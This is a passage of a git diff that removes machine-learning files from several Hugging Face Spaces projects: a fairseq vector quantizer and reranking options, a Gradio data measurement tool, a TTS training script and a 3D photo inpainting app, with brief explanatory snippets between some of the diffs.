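    img = np.ascontiguousarray(img[:, ::-1, :])       # stand-in processing: mirror the frame
    return av.VideoFrame.from_ndarray(img, format="bgr24")

webrtc_streamer(key="example", video_frame_callback=video_frame_callback)
```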
diff --git a/spaces/HaHaBill/LandShapes-Antarctica/netdissect/upsegmodel/prroi_pool/__init__.py b/spaces/HaHaBill/LandShapes-Antarctica/netdissect/upsegmodel/prroi_pool/__init__.py
deleted file mode 100644
index 0c40b7a7e2bca8a0dbd28e13815f2f2ad6c4728b..0000000000000000000000000000000000000000
--- a/spaces/HaHaBill/LandShapes-Antarctica/netdissect/upsegmodel/prroi_pool/__init__.py
+++ /dev/null
@@ -1,13 +0,0 @@
-#! /usr/bin/env python3
-# -*- coding: utf-8 -*-
-# File : __init__.py
-# Author : Jiayuan Mao, Tete Xiao
-# Email : maojiayuan@gmail.com, jasonhsiao97@gmail.com
-# Date : 07/13/2018
-#
-# This file is part of PreciseRoIPooling.
-# Distributed under terms of the MIT license.
-# Copyright (c) 2017 Megvii Technology Limited.
-
-from .prroi_pool import *
-
diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/modules/kmeans_vector_quantizer.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/modules/kmeans_vector_quantizer.py
deleted file mode 100644
index 040db1e83e775a3bb59d5263d22aae9276a83f22..0000000000000000000000000000000000000000
--- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/modules/kmeans_vector_quantizer.py
+++ /dev/null
@@ -1,127 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-import torch
-import torch.nn as nn
-from fairseq.modules import Fp32GroupNorm
-
-
-class KmeansVectorQuantizer(nn.Module):
- def __init__(
- self, dim, num_vars, groups, combine_groups, vq_dim, time_first, gamma=0.25
- ):
- """Vector quantization using straight pass-through estimator (i.e. kmeans)
-
- Args:
- dim: input dimension (channels)
- num_vars: number of quantized vectors per group
- groups: number of groups for vector quantization
- combine_groups: whether to use the vectors for all groups
- vq_dim: dimensionality of the resulting quantized vector
- time_first: if true, expect input in BxTxC format, otherwise in BxCxT
- gamma: commitment loss coefficient
- """
- super().__init__()
-
- self.groups = groups
- self.combine_groups = combine_groups
- self.input_dim = dim
- self.num_vars = num_vars
- self.vq_dim = vq_dim
- self.time_first = time_first
-
- assert (
- vq_dim % groups == 0
- ), f"dim {vq_dim} must be divisible by groups {groups} for concatenation"
-
- self.var_dim = vq_dim // groups
- num_groups = groups if not combine_groups else 1
-
- self.embedding = nn.Parameter(
- 0.01 * torch.randn(num_vars, num_groups, self.var_dim)
- )
- self.projection = nn.Sequential(
- nn.Conv1d(dim, dim, kernel_size=1, groups=groups, bias=False),
- Fp32GroupNorm(groups, dim),
- )
- self.gamma = gamma
- self.mse_mean = nn.MSELoss(reduction="mean")
-
- def _pass_grad(self, x, y):
- """Manually set gradient for backward pass.
- for y = f(x), ensure that during the backward pass,
- dL/dy = dL/dx regardless of f(x).
- Returns:
- y, with the gradient forced to be dL/dy = dL/dx.
- """
-
- return y.detach() + (x - x.detach())
-
- @property
- def expand_embedding(self):
- if self.combine_groups:
- return self.embedding.expand(self.num_vars, self.groups, self.var_dim)
- return self.embedding
-
- def forward_idx(self, x):
- res = self.forward(x, produce_targets=True)
- return res["x"], res["targets"]
-
- def forward(self, x, produce_targets=False):
-
- result = {"num_vars": self.num_vars}
-
- if self.time_first:
- x = x.transpose(1, 2)
-
- bsz, fsz, tsz = x.shape
-
- ze = self.projection(x)
- ze_ = ze.view(bsz, self.groups, self.var_dim, tsz).permute(0, 3, 1, 2)
- d = (
- (ze_.unsqueeze(0) - self.expand_embedding.unsqueeze(1).unsqueeze(1))
- .view(self.num_vars, bsz, tsz, self.groups, -1)
- .norm(dim=-1, p=2)
- )
- idx = d.argmin(dim=0)
- zq = (
- torch.stack(
- [
- self.expand_embedding[idx[..., group], group]
- for group in range(self.groups)
- ],
- dim=-2,
- )
- .view(bsz, tsz, self.groups * self.var_dim)
- .permute(0, 2, 1)
- )
- assert ze.shape == zq.shape, (ze.shape, zq.shape)
- x = self._pass_grad(ze, zq)
-
- hard_x = (
- idx.new_zeros(bsz * tsz * self.groups, self.num_vars)
- .scatter_(-1, idx.view(-1, 1), 1.0)
- .view(bsz * tsz, self.groups, -1)
- )
- hard_probs = torch.mean(hard_x.float(), dim=0)
- result["code_perplexity"] = torch.exp(
- -torch.sum(hard_probs * torch.log(hard_probs + 1e-7), dim=-1)
- ).sum()
-
- if produce_targets:
- result["targets"] = idx
-
- if self.time_first:
- x = x.transpose(1, 2) # BCT -> BTC
- result["x"] = x
-
- ze = ze.float()
- zq = zq.float()
- latent_loss = self.mse_mean(zq, ze.detach())
- commitment_loss = self.mse_mean(ze, zq.detach())
-
- result["kmeans_loss"] = latent_loss + self.gamma * commitment_loss
-
- return result
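The `_pass_grad` helper above is the straight-through trick: the forward value comes from the quantized `y`, while gradients flow back as if the output were `x`. A tiny self-contained demonstration of the same identity:

```python
import torch

x = torch.tensor([0.3, 1.7], requires_grad=True)
y = torch.round(x)                    # non-differentiable stand-in for the quantizer

ste = y.detach() + (x - x.detach())   # forward equals y; gradient w.r.t. x is the identity
ste.sum().backward()

print(ste)      # tensor([0., 2.], grad_fn=<AddBackward0>)
print(x.grad)   # tensor([1., 1.])
```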
diff --git a/spaces/HarshulNanda/HARM_ML_App_ludwig/eduContentPredictor.py b/spaces/HarshulNanda/HARM_ML_App_ludwig/eduContentPredictor.py
deleted file mode 100644
index 67deda3300672cfb4777618d4e705488bf80059c..0000000000000000000000000000000000000000
--- a/spaces/HarshulNanda/HARM_ML_App_ludwig/eduContentPredictor.py
+++ /dev/null
@@ -1,31 +0,0 @@
-from youtubesearchpython import Transcript, Video, ResultMode
-import pickle
-from stqdm import stqdm
-import pandas as pd
-
-def eduContentPrediction(url):
- segments = Transcript.get(url)["segments"]
- E = 0
- NonE = 0
- # education_model = pickle.load(open("./models/educated_model.pkl", "rb"))
-
- education_classifier = pickle.load(open("./models/ludwig_edu.pkl", "rb"))
-
- timer = stqdm(segments)
-
- for segment in timer:
- timer.set_description("☕️ Have a coffee, while we apply our model on the video transcript. ")
- text_to_predict = pd.DataFrame({
- "text": [
- str(segment["text"]),
- ]
- })
- edu_pred, _ = education_classifier.predict(text_to_predict)
- text_prediction = list(edu_pred.category_predictions)[0]
- # text_prediction = education_model.predict(text)[0]
- if text_prediction == "Education":
- E += 1
- else:
- NonE += 1
-
- return "The {:.2f}% portion of this video is educational.".format(E*100/(E+NonE))
\ No newline at end of file
diff --git a/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/scripts/train_glow.sh b/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/scripts/train_glow.sh
deleted file mode 100644
index 3b563f17b0ec66ac2f7e3c35f973f7890f02570c..0000000000000000000000000000000000000000
--- a/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/scripts/train_glow.sh
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/bin/bash
-
-config=''
-modeldir=''
-logdir=''
-init=1 # 1, start from scratch - 0, start from last checkpoint
-
-if [[ $init -eq 1 ]]
-then
- python ../src/glow_tts/init.py -c $config -m $modeldir -l $logdir
-fi
-python ../src/glow_tts/train.py -c $config -m $modeldir -l $logdir
diff --git a/spaces/Harveenchadha/en_to_indic_translation/indic_nlp_library/indicnlp/syllable/__init__.py b/spaces/Harveenchadha/en_to_indic_translation/indic_nlp_library/indicnlp/syllable/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/HuangLab/CELL-E_2-Image_Prediction/README.md b/spaces/HuangLab/CELL-E_2-Image_Prediction/README.md
deleted file mode 100644
index e51ef2ec43883636a865622fd2019475de4fed5a..0000000000000000000000000000000000000000
--- a/spaces/HuangLab/CELL-E_2-Image_Prediction/README.md
+++ /dev/null
@@ -1,16 +0,0 @@
----
-title: CELL-E 2 - Image Prediction
-emoji: 🔬
-colorFrom: red
-colorTo: purple
-sdk: gradio
-python_version: 3.11.5
-sdk_version: 3.45.2
-app_file: app.py
-tags: [proteins, text-to-image]
-fullWidth: true
-pinned: true
-license: mit
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/HuggingFaceM4/IDEFICS_Data_Measurement_Tool/app.py b/spaces/HuggingFaceM4/IDEFICS_Data_Measurement_Tool/app.py
deleted file mode 100644
index 7cf0ae5e8fc8ab57d73c3d3956c084e3fec37450..0000000000000000000000000000000000000000
--- a/spaces/HuggingFaceM4/IDEFICS_Data_Measurement_Tool/app.py
+++ /dev/null
@@ -1,265 +0,0 @@
-# Copyright 2021 The HuggingFace Team. All rights reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-import argparse
-import ast
-import gradio as gr
-from os.path import isdir
-from data_measurements.dataset_statistics import DatasetStatisticsCacheClass as dmt_cls
-import utils
-from utils import dataset_utils
-from utils import gradio_utils as gr_utils
-import widgets
-
-logs = utils.prepare_logging(__file__)
-
-# Utility for sidebar description and selection of the dataset
-DATASET_NAME_TO_DICT = dataset_utils.get_dataset_info_dicts()
-
-
-def get_load_prepare_list(dstats):
- """
- # Get load_or_prepare functions for the measurements we will display
- """
- # Measurement calculation:
- # Add any additional modules and their load-prepare function here.
- load_prepare_list = [("general stats", dstats.load_or_prepare_general_stats),
- ("label distribution", dstats.load_or_prepare_labels),
- ("text_lengths", dstats.load_or_prepare_text_lengths),
- ("duplicates", dstats.load_or_prepare_text_duplicates),
- ("npmi", dstats.load_or_prepare_npmi),
- ("zipf", dstats.load_or_prepare_zipf)]
-
- return load_prepare_list
-
-
-def get_ui_widgets():
- """Get the widgets that will be displayed in the UI."""
- return [widgets.DatasetDescription(DATASET_NAME_TO_DICT),
- widgets.GeneralStats(),
- widgets.LabelDistribution(),
- widgets.TextLengths(),
- widgets.Duplicates(),
- widgets.Npmi(),
- widgets.Zipf()]
-
-
-def get_widgets():
- """
- # A measurement widget requires 2 things:
- # - A load or prepare function
- # - A display function
- # We define these in two separate functions get_load_prepare_list and get_ui_widgets;
- # any widget can be added by modifying both functions and the rest of the app logic will work.
- # get_load_prepare_list is a function since it requires a DatasetStatisticsCacheClass which will
- # not be created until dataset and config values are selected in the ui
- """
- return get_load_prepare_list, get_ui_widgets()
-
-
-def get_title(dstats):
- title_str = f"### Showing: {dstats.dset_name} - {dstats.dset_config} - {dstats.split_name} - {'-'.join(dstats.text_field)}"
- logs.info("showing header")
- return title_str
-
-
-def display_initial_UI():
- """Displays the header in the UI"""
- # Extract the selected arguments
- dataset_args = gr_utils.sidebar_selection(DATASET_NAME_TO_DICT)
- return dataset_args
-
-
-def load_or_prepare_widgets(dstats, load_prepare_list, show_perplexities, live=True, pull_cache_from_hub=False):
- """
- Takes the dataset arguments from the GUI and uses them to load a dataset from the Hub or, if
- a cache for those arguments is available, to load it from the cache.
- Widget data is loaded only when the system is live (deployed for users).
- Otherwise, the data is prepared if it doesn't yet exist.
- Args:
- dstats: the DatasetStatisticsCacheClass built from the dataset arguments selected in the GUI
- load_prepare_list (list): List of (widget_name, widget_load_or_prepare_function)
- show_perplexities (Bool): whether perplexities should be loaded and displayed for this dataset
- live (Bool): Whether the system is deployed for live use by users.
- pull_cache_from_hub (Bool): Whether the cache should be pulled from the hub (vs locally)
- Returns:
- dstats: the computed dataset statistics (from the dataset_statistics class)
- """
-
- # When we're "live" (tool is being used by users on our servers),
- # cache is used and the f'ns are instructed to only try to load cache,
- # not to prepare/compute anything anew.
- if live:
- # Only use what's cached; don't prepare anything
- load_only = True
- logs.info("Only using cache.")
- else:
- # Prepare things anew and cache them if we're not live.
- load_only = False
- logs.info("Making new calculations if cache is not there.")
- if pull_cache_from_hub:
- dataset_utils.pull_cache_from_hub(dstats.cache_path, dstats.dataset_cache_dir)
-
- # Data common across DMT:
- # Includes the dataset text/requested feature column,
- # the dataset tokenized, and the vocabulary
- dstats.load_or_prepare_text_dataset(load_only=load_only)
- # Just a snippet of the dataset
- dstats.load_or_prepare_dset_peek(load_only=load_only)
- # Tokenized dataset
- dstats.load_or_prepare_tokenized_df(load_only=load_only)
- # Vocabulary (uses tokenized dataset)
- dstats.load_or_prepare_vocab(load_only=load_only)
- # Custom widgets
- for widget_tuple in load_prepare_list:
- widget_name = widget_tuple[0]
- widget_fn = widget_tuple[1]
- try:
- widget_fn(load_only=load_only)
- except Exception as e:
- logs.warning("Issue with %s." % widget_name)
- logs.exception(e)
- # TODO: If these are cached, can't we just show them by default?
- # It won't take up computation time.
- if show_perplexities:
- try:
- dstats.load_or_prepare_text_perplexities(load_only=load_only)
- except Exception as e:
- logs.warning("Issue with %s." % "perplexities")
- logs.exception(e)
- return dstats
-
-
-def show_column(dstats, display_list, show_perplexities, column_id=""):
- """
- Function for displaying the elements in the gradio app.
- Args:
- dstats (class): The dataset_statistics.py DatasetStatisticsCacheClass
- display_list (list): List of tuples for (widget_name, widget_display_function)
- show_perplexities (Bool): Whether perplexities should be loaded and displayed for this dataset
- column_id (str): Which column of the dataset the analysis is done on [DEPRECATED for v1]
- """
-
- # start showing stuff
- gr_utils.expander_header(dstats, DATASET_NAME_TO_DICT)
- for widget_tuple in display_list:
- widget_type = widget_tuple[0]
- widget_fn = widget_tuple[1]
- logs.info("showing %s." % widget_type)
- try:
- widget_fn(dstats, column_id)
- except Exception as e:
- logs.warning("Jk jk jk. There was an issue with %s:" % widget_type)
- logs.exception(e)
- # TODO: Fix how this is a weird outlier.
- if show_perplexities:
- gr_utils.expander_text_perplexities(dstats, column_id)
- logs.info("Have finished displaying the widgets.")
-
-
-def create_demo(live: bool, pull_cache_from_hub: bool):
- with gr.Blocks() as demo:
- state = gr.State()
- with gr.Row():
- with gr.Column(scale=1):
- dataset_args = display_initial_UI()
- get_load_prepare_list_fn, widget_list = get_widgets()
- # # TODO: Make this less of a weird outlier.
- # Doesn't do anything right now
- show_perplexities = gr.Checkbox(label="Show text perplexities")
- with gr.Column(scale=4):
- gr.Markdown("# Data Measurements Tool")
- title = gr.Markdown()
- for widget in widget_list:
- widget.render()
-
- def update_ui(dataset: str, config: str, split: str, feature: str):
- feature = ast.literal_eval(feature)
- label_field, label_names = gr_utils.get_label_names(dataset, config, DATASET_NAME_TO_DICT)
- dstats = dmt_cls(dset_name=dataset, dset_config=config, split_name=split, text_field=feature,
- label_field=label_field, label_names=label_names, use_cache=True)
- load_prepare_list = get_load_prepare_list_fn(dstats)
- dstats = load_or_prepare_widgets(dstats, load_prepare_list, show_perplexities=False,
- live=live, pull_cache_from_hub=pull_cache_from_hub)
- output = {title: get_title(dstats), state: dstats}
- for widget in widget_list:
- output.update(widget.update(dstats))
- return output
-
- def update_dataset(dataset: str):
- new_values = gr_utils.update_dataset(dataset, DATASET_NAME_TO_DICT)
- config = new_values[0][1]
- feature = new_values[1][1]
- split = new_values[2][1]
- new_dropdown = {
- dataset_args["dset_config"]: gr.Dropdown.update(choices=new_values[0][0], value=config),
- dataset_args["text_field"]: gr.Dropdown.update(choices=new_values[1][0], value=feature),
- dataset_args["split_name"]: gr.Dropdown.update(choices=new_values[2][0], value=split),
- }
- return new_dropdown
-
- def update_config(dataset: str, config: str):
- new_values = gr_utils.update_config(dataset, config, DATASET_NAME_TO_DICT)
-
- feature = new_values[0][1]
- split = new_values[1][1]
- new_dropdown = {
- dataset_args["text_field"]: gr.Dropdown.update(choices=new_values[0][0], value=feature),
- dataset_args["split_name"]: gr.Dropdown.update(choices=new_values[1][0], value=split)
- }
- return new_dropdown
-
- measurements = [comp for output in widget_list for comp in output.output_components]
- demo.load(update_ui,
- inputs=[dataset_args["dset_name"], dataset_args["dset_config"], dataset_args["split_name"], dataset_args["text_field"]],
- outputs=[title, state] + measurements)
-
- for widget in widget_list:
- widget.add_events(state)
- #dataset_args["text_field"] --> the text that could be returned
- dataset_args["dset_name"].change(update_dataset,
- inputs=[dataset_args["dset_name"]],
- outputs=[dataset_args["dset_config"],
- dataset_args["split_name"], dataset_args["text_field"],
- title, state] + measurements)
-
- dataset_args["dset_config"].change(update_config,
- inputs=[dataset_args["dset_name"], dataset_args["dset_config"]],
- outputs=[dataset_args["split_name"], dataset_args["text_field"],
- title, state] + measurements)
-
- dataset_args["calculate_btn"].click(update_ui,
- inputs=[dataset_args["dset_name"], dataset_args["dset_config"],
- dataset_args["split_name"], dataset_args["text_field"]],
- outputs=[title, state] + measurements)
- return demo
-
-
-def main():
- parser = argparse.ArgumentParser()
- parser.add_argument(
- "--live", default=False, required=False, action="store_true", help="Flag to specify that this is not running live.")
- parser.add_argument(
- "--pull_cache_from_hub", default=False, required=False, action="store_true", help="Flag to specify whether to look in the hub for measurements caches. If you are using this option, you must have HUB_CACHE_ORGANIZATION= and HF_TOKEN= on separate lines in a file named .env at the root of this repo.")
- arguments = parser.parse_args()
- live = arguments.live
- pull_cache_from_hub = arguments.pull_cache_from_hub
-
- # Create and initialize the demo
- demo = create_demo(live, pull_cache_from_hub)
-
- demo.launch()
-
-if __name__ == "__main__":
- main()
diff --git a/spaces/ICML2022/OFA/fairseq/examples/noisychannel/rerank_options.py b/spaces/ICML2022/OFA/fairseq/examples/noisychannel/rerank_options.py
deleted file mode 100644
index de91939e6635bdf33c9dc330116be07d9e8be6a2..0000000000000000000000000000000000000000
--- a/spaces/ICML2022/OFA/fairseq/examples/noisychannel/rerank_options.py
+++ /dev/null
@@ -1,149 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-from fairseq import options
-
-
-def get_reranking_parser(default_task="translation"):
- parser = options.get_parser("Generation and reranking", default_task)
- add_reranking_args(parser)
- return parser
-
-
-def get_tuning_parser(default_task="translation"):
- parser = options.get_parser("Reranking tuning", default_task)
- add_reranking_args(parser)
- add_tuning_args(parser)
- return parser
-
-
-def add_reranking_args(parser):
- group = parser.add_argument_group("Reranking")
- # fmt: off
- group.add_argument('--score-model1', '-s1', type=str, metavar='FILE', required=True,
- help='path to first model or ensemble of models for rescoring')
- group.add_argument('--score-model2', '-s2', type=str, metavar='FILE', required=False,
- help='path to second model or ensemble of models for rescoring')
- group.add_argument('--num-rescore', '-n', type=int, metavar='N', default=10,
- help='the number of candidate hypothesis to rescore')
- group.add_argument('-bz', '--batch-size', type=int, metavar='N', default=128,
- help='batch size for generating the nbest list')
- group.add_argument('--gen-subset', default='test', metavar='SET', choices=['test', 'train', 'valid'],
- help='data subset to generate (train, valid, test)')
- group.add_argument('--gen-model', default=None, metavar='FILE',
- help='the model to generate translations')
- group.add_argument('-b1', '--backwards1', action='store_true',
- help='whether or not the first model group is backwards')
- group.add_argument('-b2', '--backwards2', action='store_true',
- help='whether or not the second model group is backwards')
- group.add_argument('-a', '--weight1', default=1, nargs='+', type=float,
- help='the weight(s) of the first model')
- group.add_argument('-b', '--weight2', default=1, nargs='+', type=float,
- help='the weight(s) of the second model, or the gen model if using nbest from interactive.py')
- group.add_argument('-c', '--weight3', default=1, nargs='+', type=float,
- help='the weight(s) of the third model')
-
- # lm arguments
- group.add_argument('-lm', '--language-model', default=None, metavar='FILE',
- help='language model for target language to rescore translations')
- group.add_argument('--lm-dict', default=None, metavar='FILE',
- help='the dict of the language model for the target language')
- group.add_argument('--lm-name', default=None,
- help='the name of the language model for the target language')
- group.add_argument('--lm-bpe-code', default=None, metavar='FILE',
- help='the bpe code for the language model for the target language')
- group.add_argument('--data-dir-name', default=None,
- help='name of data directory')
- group.add_argument('--lenpen', default=1, nargs='+', type=float,
- help='length penalty: <1.0 favors shorter, >1.0 favors longer sentences')
- group.add_argument('--score-dict-dir', default=None,
- help='the directory with dictionaries for the scoring models')
- group.add_argument('--right-to-left1', action='store_true',
- help='whether the first model group is a right to left model')
- group.add_argument('--right-to-left2', action='store_true',
- help='whether the second model group is a right to left model')
- group.add_argument('--post-process', '--remove-bpe', default='@@ ',
- help='the bpe symbol, used for the bitext and LM')
- group.add_argument('--prefix-len', default=None, type=int,
- help='the length of the target prefix to use in rescoring (in terms of words wo bpe)')
- group.add_argument('--sampling', action='store_true',
- help='use sampling instead of beam search for generating n best list')
- group.add_argument('--diff-bpe', action='store_true',
- help='bpe for rescoring and nbest list not the same')
- group.add_argument('--rescore-bpe-code', default=None,
- help='bpe code for rescoring models')
- group.add_argument('--nbest-list', default=None,
- help='use predefined nbest list in interactive.py format')
- group.add_argument('--write-hypos', default=None,
- help='filename prefix to write hypos to')
- group.add_argument('--ref-translation', default=None,
- help='reference translation to use with nbest list from interactive.py')
- group.add_argument('--backwards-score-dict-dir', default=None,
- help='the directory with dictionaries for the backwards model,'
- 'if None then it is assumed the fw and backwards models share dictionaries')
-
- # extra scaling args
- group.add_argument('--gen-model-name', default=None,
- help='the name of the models that generated the nbest list')
- group.add_argument('--model1-name', default=None,
- help='the name of the set for model1 group ')
- group.add_argument('--model2-name', default=None,
- help='the name of the set for model2 group')
- group.add_argument('--shard-id', default=0, type=int,
- help='the id of the shard to generate')
- group.add_argument('--num-shards', default=1, type=int,
- help='the number of shards to generate across')
- group.add_argument('--all-shards', action='store_true',
- help='use all shards')
- group.add_argument('--target-prefix-frac', default=None, type=float,
- help='the fraction of the target prefix to use in rescoring (in terms of words wo bpe)')
- group.add_argument('--source-prefix-frac', default=None, type=float,
- help='the fraction of the source prefix to use in rescoring (in terms of words wo bpe)')
- group.add_argument('--normalize', action='store_true',
- help='whether to normalize by src and target len')
- # fmt: on
- return group
-
-
-def add_tuning_args(parser):
- group = parser.add_argument_group("Tuning")
-
- group.add_argument(
- "--lower-bound",
- default=[-0.7],
- nargs="+",
- type=float,
- help="lower bound of search space",
- )
- group.add_argument(
- "--upper-bound",
- default=[3],
- nargs="+",
- type=float,
- help="upper bound of search space",
- )
- group.add_argument(
- "--tune-param",
- default=["lenpen"],
- nargs="+",
- choices=["lenpen", "weight1", "weight2", "weight3"],
- help="the parameter(s) to tune",
- )
- group.add_argument(
- "--tune-subset",
- default="valid",
- choices=["valid", "test", "train"],
- help="the subset to tune on ",
- )
- group.add_argument(
- "--num-trials",
- default=1000,
- type=int,
- help="number of trials to do for random search",
- )
- group.add_argument(
- "--share-weights", action="store_true", help="share weight2 and weight 3"
- )
- return group
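These option builders plug into fairseq's standard argparse flow. A short sketch of how they would typically be consumed (assumes the fairseq repo layout, so the import path is illustrative):

```python
from fairseq import options
# assumes the fairseq `examples` package is importable (i.e. running from the repo root)
from examples.noisychannel import rerank_options

parser = rerank_options.get_reranking_parser()
parser.print_help()   # lists --score-model1/-s1, --num-rescore/-n, --lenpen, ...

# a full run would then parse real CLI arguments, e.g.:
# args = options.parse_args_and_arch(parser)
```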
diff --git a/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/data/__init__.py b/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/data/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/Jacks2003/3D_Photo_Inpainting/app.py b/spaces/Jacks2003/3D_Photo_Inpainting/app.py
deleted file mode 100644
index e2f4ea41bc89a74d79fa974a0f3f066820e3c27f..0000000000000000000000000000000000000000
--- a/spaces/Jacks2003/3D_Photo_Inpainting/app.py
+++ /dev/null
@@ -1,230 +0,0 @@
-# Repo source: https://github.com/vt-vl-lab/3d-photo-inpainting
-
-import os
-#os.environ['QT_DEBUG_PLUGINS'] = '1'
-
-import subprocess
-#subprocess.run('ldd /home/user/.local/lib/python3.8/site-packages/PyQt5/Qt/plugins/platforms/libqxcb.so', shell=True)
-#subprocess.run('pip list', shell=True)
-subprocess.run('nvidia-smi', shell=True)
-os.mkdir("image")
-
-from pyvirtualdisplay import Display
-display = Display(visible=0, size=(1920, 1080)).start()
-#subprocess.run('echo $DISPLAY', shell=True)
-
-# 3d inpainting imports
-import numpy as np
-import argparse
-import glob
-import os
-from functools import partial
-import vispy
-import scipy.misc as misc
-from tqdm import tqdm
-import yaml
-import time
-import sys
-from mesh import write_ply, read_ply, output_3d_photo
-from utils import get_MiDaS_samples, read_MiDaS_depth
-import torch
-import cv2
-from skimage.transform import resize
-import imageio
-import copy
-from networks import Inpaint_Color_Net, Inpaint_Depth_Net, Inpaint_Edge_Net
-from MiDaS.run import run_depth
-from boostmonodepth_utils import run_boostmonodepth
-from MiDaS.monodepth_net import MonoDepthNet
-import MiDaS.MiDaS_utils as MiDaS_utils
-from bilateral_filtering import sparse_bilateral_filtering
-
-import torch
-
-# gradio imports
-import gradio as gr
-import uuid
-from PIL import Image
-from pathlib import Path
-import shutil
-from time import sleep
-
-def inpaint(img_name, num_frames, fps):
-
- config = yaml.load(open('argument.yml', 'r'), Loader=yaml.FullLoader)
-
- config['num_frames'] = num_frames
- config['fps'] = fps
-
- if torch.cuda.is_available():
- config['gpu_ids'] = 0
-
- if config['offscreen_rendering'] is True:
- vispy.use(app='egl')
-
- os.makedirs(config['mesh_folder'], exist_ok=True)
- os.makedirs(config['video_folder'], exist_ok=True)
- os.makedirs(config['depth_folder'], exist_ok=True)
- sample_list = get_MiDaS_samples(config['src_folder'], config['depth_folder'], config, config['specific'], img_name.stem)
- normal_canvas, all_canvas = None, None
-
- if isinstance(config["gpu_ids"], int) and (config["gpu_ids"] >= 0):
- device = config["gpu_ids"]
- else:
- device = "cpu"
-
- print(f"running on device {device}")
-
- for idx in tqdm(range(len(sample_list))):
- depth = None
- sample = sample_list[idx]
- print("Current Source ==> ", sample['src_pair_name'])
- mesh_fi = os.path.join(config['mesh_folder'], sample['src_pair_name'] +'.ply')
- image = imageio.imread(sample['ref_img_fi'])
-
- print(f"Running depth extraction at {time.time()}")
- if config['use_boostmonodepth'] is True:
- run_boostmonodepth(sample['ref_img_fi'], config['src_folder'], config['depth_folder'])
- elif config['require_midas'] is True:
- run_depth([sample['ref_img_fi']], config['src_folder'], config['depth_folder'],
- config['MiDaS_model_ckpt'], MonoDepthNet, MiDaS_utils, target_w=640)
-
- if 'npy' in config['depth_format']:
- config['output_h'], config['output_w'] = np.load(sample['depth_fi']).shape[:2]
- else:
- config['output_h'], config['output_w'] = imageio.imread(sample['depth_fi']).shape[:2]
- frac = config['longer_side_len'] / max(config['output_h'], config['output_w'])
- config['output_h'], config['output_w'] = int(config['output_h'] * frac), int(config['output_w'] * frac)
- config['original_h'], config['original_w'] = config['output_h'], config['output_w']
- if image.ndim == 2:
- image = image[..., None].repeat(3, -1)
- if np.sum(np.abs(image[..., 0] - image[..., 1])) == 0 and np.sum(np.abs(image[..., 1] - image[..., 2])) == 0:
- config['gray_image'] = True
- else:
- config['gray_image'] = False
- image = cv2.resize(image, (config['output_w'], config['output_h']), interpolation=cv2.INTER_AREA)
- depth = read_MiDaS_depth(sample['depth_fi'], 3.0, config['output_h'], config['output_w'])
- mean_loc_depth = depth[depth.shape[0]//2, depth.shape[1]//2]
- if not(config['load_ply'] is True and os.path.exists(mesh_fi)):
- vis_photos, vis_depths = sparse_bilateral_filtering(depth.copy(), image.copy(), config, num_iter=config['sparse_iter'], spdb=False)
- depth = vis_depths[-1]
- model = None
- torch.cuda.empty_cache()
- print("Start Running 3D_Photo ...")
- print(f"Loading edge model at {time.time()}")
- depth_edge_model = Inpaint_Edge_Net(init_weights=True)
- depth_edge_weight = torch.load(config['depth_edge_model_ckpt'],
- map_location=torch.device(device))
- depth_edge_model.load_state_dict(depth_edge_weight)
- depth_edge_model = depth_edge_model.to(device)
- depth_edge_model.eval()
-
- print(f"Loading depth model at {time.time()}")
- depth_feat_model = Inpaint_Depth_Net()
- depth_feat_weight = torch.load(config['depth_feat_model_ckpt'],
- map_location=torch.device(device))
- depth_feat_model.load_state_dict(depth_feat_weight, strict=True)
- depth_feat_model = depth_feat_model.to(device)
- depth_feat_model.eval()
- depth_feat_model = depth_feat_model.to(device)
- print(f"Loading rgb model at {time.time()}")
- rgb_model = Inpaint_Color_Net()
- rgb_feat_weight = torch.load(config['rgb_feat_model_ckpt'],
- map_location=torch.device(device))
- rgb_model.load_state_dict(rgb_feat_weight)
- rgb_model.eval()
- rgb_model = rgb_model.to(device)
- graph = None
-
-
- print(f"Writing depth ply (and basically doing everything) at {time.time()}")
- rt_info = write_ply(image,
- depth,
- sample['int_mtx'],
- mesh_fi,
- config,
- rgb_model,
- depth_edge_model,
- depth_edge_model,
- depth_feat_model)
-
- if rt_info is False:
- continue
- rgb_model = None
- color_feat_model = None
- depth_edge_model = None
- depth_feat_model = None
- torch.cuda.empty_cache()
- if config['save_ply'] is True or config['load_ply'] is True:
- verts, colors, faces, Height, Width, hFov, vFov = read_ply(mesh_fi)
- else:
- verts, colors, faces, Height, Width, hFov, vFov = rt_info
-
-
- print(f"Making video at {time.time()}")
- videos_poses, video_basename = copy.deepcopy(sample['tgts_poses']), sample['tgt_name']
- top = (config.get('original_h') // 2 - sample['int_mtx'][1, 2] * config['output_h'])
- left = (config.get('original_w') // 2 - sample['int_mtx'][0, 2] * config['output_w'])
- down, right = top + config['output_h'], left + config['output_w']
- border = [int(xx) for xx in [top, down, left, right]]
